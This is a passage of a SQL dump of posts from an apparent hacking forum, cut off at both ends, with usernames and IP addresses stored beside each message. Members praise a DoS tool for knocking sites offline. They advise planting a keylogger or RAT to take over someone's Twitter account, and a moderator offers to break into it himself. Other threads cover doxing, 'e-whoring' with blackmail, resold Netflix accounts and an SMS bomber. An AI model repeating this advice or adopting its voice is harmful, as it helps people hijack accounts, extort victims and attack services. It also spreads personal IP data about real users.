`edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('943', '2', '938', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1345922876', '[quote=\'Baws\' pid=\'938\' dateline=\'1345919297\'] [quote=\'iTzIpod\' pid=\'922\' dateline=\'1345912169\'] [img]http://i.imgur.com/rKDZL.png[/img] My results. Changes some stuff up. This will probably be my Usergroup Name. Unique? [/quote] In my opinion the text is kind of hard to read. [/quote] I agree with you. I failed on this :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8fd457b7bfee8f9c252bf0f71cfb154', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('944', '230', '934', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345922950', '[quote=\'Sin Cara\' pid=\'934\' dateline=\'1345918850\'] [quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\'] Alright There are probably more. Some links are unknown Some links are broken. [Spoiler] http://www.ajoyfulheart.com/pspphot...shresources.htm http://www.smashingmagazine.com/2007/01%C3%83...tutorials/ http://graphicssoft.about.com/od/illust%C3%83...lrings.htm http://www.adobe.com/support/fireworks/%C3%83...index.html http://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts [/Spoiler] [/quote] The links are dead because of server is down. [/quote] Adobe is down? Are you sure? It is up. It doesn\'t work because of the ... in the URL. -.- Fix them', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eab1949bf1f97b0520b200cc5dc4e34c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('945', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '127', 'Eucliwood', '1345924608', 'i didnt get it to work, i tryed take down a site but when i started the attack it seems like i ddosed myself cause i would not acces any website, or send messages to people on skype and i was inlogged on a game and i disconnected.', '88.90.14.9', '1482296841', '1', '0', '0', '0', '1', 'f4e4b443f1534e45dae5741e9c22629c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('946', '229', '923', '12', 'RE: How to setup a Keylogger [tut]', '0', '53', 'sirchamp', '1345925884', 'It isnt necesary but I advise it.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '7c5c69c0f6e89a0b89e0e905052ea109', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('951', '232', '949', '50', 'RE: Triple H', '0', '1', 't3h jok3r', '1345934731', '1. There\'s no need for you to tell us what to do, we are moderating LH for a reason and have a right to take an action on our discretion. 2. There was no need for you to promote HF and ubers on his virus o matic thread. 3. Triple H was given the right to redistribute the virus o matic program. Thanks for your report though, you could have also reported it with the report button. We will issue him a warning, a BAN is too much.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '0fd3eb4af8aa03277849cfa7d5b18b55', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('948', '227', '920', '13', 'RE: hack twitter?', '0', '53', 'sirchamp', '1345926941', 'Well you would have to hack his account. Just setup a keylogger or a RAT on his computer.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '04226065bc139e71d42764ff389c35e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('949', '232', '0', '50', 'Triple H', '0', '53', 'sirchamp', '1345927812', 'Triple H is making lots of threads and tutorials lately but then I saw that nearly all of them are copied of other sites. He isnt giving any credits to the real thread maker! He is just copying the exact same thing and pasting it here. Something has to be done about that. *cough ban cough*', '188.155.56.90', '-1130678182', '1', '0', '53', '1345927971', '1', 'e723f2d08f9e09a47c56e84d3839ce64', '0', '1345927971'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('950', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '67', 'HoverCatz', '1345929624', 'Joker this is a Dos, not DDoS :) Correct the Title', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '7fe1fc794eaa0dee41256cb858933022', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('952', '140', '357', '19', '[Junk]???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '1', 't3h jok3r', '1345934849', 'This thread has been junked.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('953', '213', '878', '58', 'RE: What group(s) would you like to see?', '0', '1', 't3h jok3r', '1345935403', '[quote=\'iTzIpod\' pid=\'878\' dateline=\'1345867692\'] I would like to see a comic/troll group. I will be filling out the application tomorrow and post it on the other thread. =] Will be looking for a co - leader too. [/quote] Troll groups are not accepted. >:) I will take a look at your application in a while.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6bc3409aa274a323e968cc5356a87719', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('954', '29', '945', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '1', 't3h jok3r', '1345935820', '[quote=\'Eucliwood\' pid=\'945\' dateline=\'1345924608\'] i didnt get it to work, i tryed take down a site but when i started the attack it seems like i ddosed myself cause i would not acces any website, or send messages to people on skype and i was inlogged on a game and i disconnected. [/quote] No, it\'s a DoS tool so it takes packets from your side and sends it to the website. [quote=\'HoverCatz\' pid=\'950\' dateline=\'1345929624\'] Joker this is a Dos, not DDoS :) Correct the Title [/quote] I wish I had a grammar nazi award. >:) I corrected the title, thanks..', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '173f6c547796b5d73559912fd2f5cb73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('955', '227', '948', '13', 'RE: hack twitter?', '0', '1', 't3h jok3r', '1345935903', '[quote=\'sirchamp\' pid=\'948\' dateline=\'1345926941\'] Well you would have to hack his account. Just setup a keylogger or a RAT on his computer. [/quote] That\'s what I would recommend or Social Engineering. You can also give a password reset a try. Send me a PM with the Twitter, so I could give it a try.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '3ec2bdaa5574e6061ae84e63ffdb3396', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('956', '130', '928', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1345935985', '[quote=\'HoverCatz\' pid=\'928\' dateline=\'1345918241\'] Right after this stopped working i got it working again. But it stopped working again O.o [/quote] No, Yes, No. How did you get it to work?', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6d9b0110062b236ae1ea7ddb028b290b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('957', '195', '924', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '1', 't3h jok3r', '1345936052', '[quote=\'iTzIpod\' pid=\'924\' dateline=\'1345916462\'] Updated thread. Added Thread Design. xD I failed at the Contact Info part. [/quote] Nice thread design. Mistakes happen, but you patched it.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '4fb0ff8c0680525574b21fdf0bc14589', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('959', '225', '914', '7', 'RE: E-whoring Ebook very soon :)', '0', '1', 't3h jok3r', '1345936454', 'Yippee, I\'m so awesome. Thanks. Will definitely leave a vouch on the thread.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6de975570c1d9b758328b81e41068e6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('960', '226', '919', '11', 'RE: A Newbies Guide', '0', '1', 't3h jok3r', '1345936473', 'Stickied. Well-written guide for newbies.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'e0933106a75311f68af238c5655c38ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('961', '207', '876', '3', 'RE: Suggest awards and apply for awads.', '0', '1', 't3h jok3r', '1345936584', '[quote=\'iTzIpod\' pid=\'876\' dateline=\'1345867358\'] [quote=\'Apathy\' pid=\'869\' dateline=\'1345865316\'] Rep whore and post whore sound alright as well as the others but those two are more probable. The first one is not bad either. [/quote] Just saying you wrote awads in the title instead of awards*. [/quote] Thanks for letting us know, I have edited the title behalf of Apathy.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '202bdd8f52e3f287add4e82457b95b89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('962', '210', '902', '3', 'RE: Moved Successfully!!!', '0', '1', 't3h jok3r', '1345936684', '[quote=\'duhuh\' pid=\'902\' dateline=\'1345904194\'] i did think it loaded up very quickly just now, good job :) [/quote] Yes, that\'s correct. We were receiving a heavy load of DDoS attacks so it got a bit slow. Our new shared hosting is able to keep the site up even with some kinds of DDoS Attacks.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'ac927f38776989f756b43fea52deeb26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('963', '221', '900', '7', 'RE: L33t Hacking Advertisement Video', '0', '1', 't3h jok3r', '1345936818', 'The code you are using is [code] [video=youtube;yA2swuq4YsM]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] [/code] The code you should be using is [code] [video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] [/code] So it will look like [video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '359ecba5460bd512fbedfc756a26bef2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('964', '134', '901', '47', 'RE: Win $10 for referring people', '0', '1', 't3h jok3r', '1345936834', '[quote=\'iTzIpod\' pid=\'901\' dateline=\'1345904080\'] Referred 4 members so far. Will be referring more! [/quote] Thanks for referring. 6 left.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '77fd34d79ca6d520e3653661bc771043', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('965', '40', '100', '17', 'RE: 600 pic ewhore pack', '0', '1', 't3h jok3r', '1345936890', 'Lost links :( Sorry man. I will lock the thread due to broken links.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '6251a064c6f0b3183ef361f1fc763f75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('966', '219', '888', '35', 'RE: My Designs', '0', '1', 't3h jok3r', '1345936938', 'I feel jealous now. You have more awards than me.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'f58b1598733a19e7c33eaa195c1aca9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('967', '26', '881', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '1', 't3h jok3r', '1345937077', '[quote=\'iTzIpod\' pid=\'881\' dateline=\'1345868343\'] [quote=\'t3h jok3r\' pid=\'718\' dateline=\'1345772070\'] [quote=\'iTzIpod\' pid=\'676\' dateline=\'1345752102\'] I never tried E-Whoring before. :/ I want to try it! [/quote] Give it a try, I bet you will succeed and I have been a pro in this shit so you have someone on LH for answers to your question(s) [/quote] Them pedophiles ain\'t buying what I be selling. (They aren\'t giving me that crack.) :/ (Crack=Money) :3 [/quote] Maybe they want free porn or maybe you are on saturated sites.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '581f98d37f98a32193c14e1e10c13233', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('968', '233', '0', '58', 'Reviewers Group???', '0', '1', 't3h jok3r', '1345937266', 'I was wondering if I should add a reviewers group for all the threads in the marketplace. I mean to review the Secondary and Premium sections and leave their feedbacks. What do you guys think? Leader: I have a leader in mind, but they will be 2-4 people in the group at the moment. So basically 1 leader, 1 co-leader and maybe 2 more members.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '4eee6b74ff1a289872b32375ddd8e31d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('969', '231', '929', '4', 'RE: Sup', '0', '5', 'Timmy', '1345937370', 'Welcome to LH Eucliwood! Hope you like your stay.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '8dffef4370716d3e780854e081d1a078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('970', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '5', 'Timmy', '1345937417', 'I love it, I wish I was a coder, I will try this out some day.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'd4d3abd54fc0df81f59392319040dd40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('971', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '5', 'Timmy', '1345937474', 'Yup, I also prefer PS. I like many huge companies use it as well.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '97316568c6f7422b9c1e20f57c14b3a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('972', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '5', 'Timmy', '1345937530', 'LOL I don\'t think pastebin deserves any credits.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'a23286b7865403fc022381206d58452b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('973', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '5', 'Timmy', '1345937646', 'I didn\'t get any PM(s) from you @ssasin.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '2b617aa6bdf8247204c71975046c7315', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('974', '220', '899', '55', 'RE: Windows 7 Ultimate', '0', '5', 'Timmy', '1345937741', 'Slow POS? What do you mean also it could be that you are RATTED.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '98c314e711483ff63dfe19aff4ae6c23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('975', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '1', 't3h jok3r', '1345937849', 'Guts? Well OK, I would also think twice before doing this.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'c5db7cc681fafa08b1dd5c73cbac19ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('976', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '90', 'duhuh', '1345938106', 'kind of a obvious question surely', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '31a0bfbc58da41169019669dffd77078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('977', '234', '0', '17', 'Free E-Whoring packs website plus free PORN', '0', '1', 't3h jok3r', '1345938993', 'This is a forum with adult content. I recommend this site for E-Whoring packs. To get this site, Post below.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'e5b578a1301da8a2ddb0ecf6534e7f8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('978', '229', '923', '12', 'RE: How to setup a Keylogger [tut]', '0', '1', 't3h jok3r', '1345939494', 'Dude, I seriously thought Neptune Keylogger was made by some unknown person not a company.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', '9ddd1bc0287e8fced640d9d3e0534538', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('979', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345940570', 'it was when i used the Api u gave :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '40f4ee04906cde0e31822fb70ac7fa58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('980', '235', '0', '48', 'Experiences of MOD', '0', '1', 't3h jok3r', '1345940778', 'I would like to know, how it feels to be a Mod and how\'s everything with your position. Feel free to post all your questions below.', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', 'f7662f00914aace19fba78c6758184ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('981', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1345940956', 'Oh I see. Finally one of my giveaways were useful for a moment.', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', 'b75f3846611ada0d56c6f7de78f1a942', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('982', '197', '898', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345941178', '[quote=\'iTzIpod\' pid=\'898\' dateline=\'1345900864\'] [quote=\'t3h jok3r\' pid=\'894\' dateline=\'1345898969\'] * t3h jok3r likes the cookie. Can I have more? [/quote] * iTzIpod slaps t3h jok3r with a fish for asking for more cookies without saying please. :p [/quote] /me cries for being slapped with a [s]dick[/s] fish. Was it funny? I wish I could get the jokester award :D', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', 'bf0899de0a890dc0843da2acda9fe59a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('983', '217', '882', '24', 'RE: [Fun] Find the SEX of your Computer...!!', '0', '1', 't3h jok3r', '1345941949', 'Mine is female too. Well the voice sounds of a females voice.', '41.174.54.133', '699283077', '1', '0', '0', '0', '1', '3864e004b2bae76154c100655b85af5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('985', '217', '882', '24', 'RE: [Fun] Find the SEX of your Computer...!!', '0', '54', 'Sin Cara', '1345942529', 'Let\'s check , who has male voice!!', '119.154.77.132', '2006601092', '1', '0', '0', '0', '1', '91ea38e05edf81d82783f0ffa32ea683', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('986', '226', '919', '11', 'RE: A Newbies Guide', '0', '54', 'Sin Cara', '1345942581', 'Thanks for the comments ;)', '119.154.77.132', '2006601092', '1', '0', '0', '0', '1', '965b59fb491c17726c2e2fc3dc4228f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('987', '233', '968', '58', 'RE: Reviewers Group???', '0', '54', 'Sin Cara', '1345945181', 'Hmmmmm it\'s nice suggestion :)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '6089e26e3983bb79c2d55f24b388065c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('988', '217', '882', '24', 'RE: [Fun] Find the SEX of your Computer...!!', '0', '90', 'duhuh', '1345945651', '[quote=\'Sin Cara\' pid=\'882\' dateline=\'1345868433\'] guyyyyyzzzzzzzz its really funny..:roflol::roflol::roflol: [/quote] you should get out more lol, i would love to know what would happen if a realy girl spoke to you, probably laugh in there face:P', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '49a43de58f4b8e1dad74b68f12916eb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('989', '195', '957', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1345946924', '[quote=\'t3h jok3r\' pid=\'957\' dateline=\'1345936052\'] [quote=\'iTzIpod\' pid=\'924\' dateline=\'1345916462\'] Updated thread. Added Thread Design. xD I failed at the Contact Info part. [/quote] Nice thread design. Mistakes happen, but you patched it. [/quote] Thanks. That was my first Thread Design. It was very fun trying to make it :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5850683cfa91bfb6b32b094d2e5da69c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('990', '219', '966', '35', 'RE: My Designs', '0', '82', 'iTzIpod', '1345947036', '[quote=\'t3h jok3r\' pid=\'966\' dateline=\'1345936938\'] I feel jealous now. You have more awards than me. [/quote] We both got the same number of awards.', '24.212.197.164', '416597412', '1', '0', '82', '1345948224', '1', 'edef8d9a0c482ad04603996d889cc809', '0', '1345948224'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('991', '230', '984', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345948385', '[quote=\'Sin Cara\' pid=\'984\' dateline=\'1345942431\'] [quote=\'iTzIpod\' pid=\'944\' dateline=\'1345922950\'] [quote=\'Sin Cara\' pid=\'934\' dateline=\'1345918850\'] [quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\'] Alright There are probably more. Some links are unknown Some links are 